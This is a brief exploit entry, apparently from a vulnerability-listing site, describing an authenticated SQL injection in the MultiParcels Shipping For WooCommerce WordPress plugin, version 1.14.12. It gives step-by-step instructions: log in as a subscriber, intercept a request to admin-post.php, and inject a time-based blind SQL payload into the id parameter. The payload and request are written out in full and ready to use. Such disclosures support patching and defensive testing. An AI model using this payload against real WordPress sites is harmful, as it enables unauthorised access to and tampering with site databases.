Share
## https://sploitus.com/exploit?id=WPEX-ID:8E713EAF-F332-47E2-A131-C14222201FDC
1. Install the WooCommerce plugin (dependency, no setup required) and the vulnerable plugin MultiParcels Shipping For WooCommerce version 1.14.12 (no setup required).

2. Login with Subscriber user, visit this URL and intercept the request: http://example.com/wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=1

3. Inject payload to id parameter, for example: GET /wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=(select*from(select(sleep(10)))a) HTTP/1.1